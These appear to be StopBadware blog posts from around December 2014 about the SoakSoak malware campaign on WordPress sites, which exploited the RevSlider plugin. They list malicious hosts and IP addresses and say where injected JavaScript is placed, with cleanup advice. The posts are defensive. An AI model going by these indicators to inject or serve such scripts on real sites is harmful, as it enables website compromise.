Blog

Community news and analysis: December 2014

Posted on January 16, 2015 - 14:12 by ccondon

Here's a quick (late) roundup of security community happenings from last month. Naturally, the SoakSoak malware campaign has been foremost on our minds, but December brought a number of other announcements and some neat malware analysis from our partners, too.

Security news

  • Google released code for End-to-End Chrome extension to open source (GitHub repository). As of last month, the extension, which enables end-to-end encryption for Gmail within Chrome, was not yet ready for the Chrome Web Store.
  • Qualys on December Patch Tuesday

Malware 

  • ESET and Sophos on Win32/VirLock, a parasitic, polymorphic hybrid strain of ransomware
  • Sucuri on the massive SoakSoak malware campaign, the RevSlider vulnerability that led to it, and infection evolution
  • Automattic on scanning for SoakSoak and how to begin fixing a compromised site
  • Fortinet: Analysis of a JAR obfuscated malware packer

Akeemdom malware poses as ad network

Posted on January 13, 2015 - 15:45 by ccondon

A PSA from Blake, our testing intern:

For the past two weeks, we have seen a large number of WordPress sites infected with a malicious script located at http://ads[.]akeemdom[.]com/db26 (Google Safe Browsing diagnostics). This infection is related to the SoakSoak campaign; in this case, the malware disguises itself as an ad network. Although the exploit itself has never delivered content to our testers, we have noticed its signatures. The following code snippet is typically inserted at the end of JavaScript files located in the infected site’s /wp-includes/ directory:

It’s often found in multiple scripts; be sure to check all the JavaScript files your site uses. Sucuri has additional analysis here

SoakSoak malware: Infection hallmarks and removal resources

Posted on December 24, 2014 - 14:38 by ccondon

On December 14, Sucuri wrote about the massive “SoakSoak” malware campaign targeting WordPress sites through a vulnerability in the RevSlider plugin. The plugin is wrapped into many WordPress themes (as disclosed to Sucuri by DreamHost’s Mika Epstein in September). Google blacklisted thousands of sites that they detected as having been infected with the malware. Safe Browsing diagnostics for soaksoak[.]ru indicate that Google has detected SoakSoak infections on more than 17,000 sites. Sucuri reckons over 100K sites were compromised in the campaign’s initial onslaught.

Sucuri has some snippets of bad code and cleanup advice here and here. Webmasters who have already cleaned up should note that the malware has morphed and has been reinfecting sites—more on this in our notes below.  

Our testing queue ballooned as a result of the attack, since many webmasters whose sites were infected have been requesting StopBadware reviews. We’ve also seen a number of posts on various forums (WordPress.org forum, Google’s malware and hacked site forum, our own community forum) with questions and advice on removing the malware.

The good news is that webmasters appear to be having success cleaning up SoakSoak infections. The following are some notes from our testing team on what we’re seeing with respect to this campaign. 

Obfuscated JavaScript

Initially, we saw a lot of obfuscated code on .js pages. For example, we found the following on pages such as caption.js:

obfuscated JavaScript SoakSoak malware

Collect.js

Right now, we’re seeing a lot of false “collect.js” scripts inserted into homepages, either right at the beginning of a <script> tag accompanied by other legitimate js files, or more conspicuously right after the </head> tag. 

The script itself will not deliver to our testers, but it always runs from one of a few IPs, most commonly 122.155.168.105 or 193.169.87.179. The former has been replacing the latter during recent tests, suggesting that the IP itself is periodically changing. 

The code is innocuous-looking other than its placement and the naked IP. Some examples: 

Bad script SoakSoak malware campaign

Another bad script from SoakSoak

Deleting this code gets rid of the infection (though notably not any backdoors or vulnerabilities that allowed the compromise to begin with), and webmasters do seem to be getting rid of it. 

A note on cleanup

If your site has been affected, note Sucuri's warning:

We are hearing a lot of recommendations online to just replace the swfobject.js and template-loader.php files to remove the infection...It does remove the infection, but does not address the left over backdoors and initial entry points.

In this case, the infection vector is the RevSlider plugin. In addition to getting rid of the bad code (but please don't delete files at random!), you'll need to update the plugin and any themes you're using that have RevSlider wrapped into them. Ask your hosting provider and/or a professional website malware removal specialist for help if you're unsure about the files you're modifying. You can always ask for help on free forums like the WordPress.org forum, StopBadware's community forum, and Google's malware and hacked sites forum

Pages